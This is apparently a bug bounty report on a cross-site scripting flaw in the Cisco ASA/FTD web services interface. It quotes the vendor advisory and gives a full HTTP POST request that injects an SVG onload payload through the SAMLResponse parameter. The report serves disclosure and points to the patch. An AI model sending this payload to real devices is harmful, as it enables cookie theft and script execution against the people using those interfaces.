XSS in Cisco Endpoint

**Description:** Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. ## References https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe ## Impact With this vulnerability, an attacker can steal users cookies, redirect users to a malicious website, or execute arbitrary javascript. ## System Host(s) ███ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2023-3580 ## Steps to Reproduce 1.) Perform the following post request. POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: ███████ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Connection: close Hackerone: R00tdaddy Content-Length: 72 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate, br SAMLResponse=%22%3E%3Csvg/onload=alert(/2XUkWJ29OE88uyTbdZ3a2UmA828/)%3E SAML Response pops up in the browser. ## Suggested Mitigation/Remediation Actions Patch : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe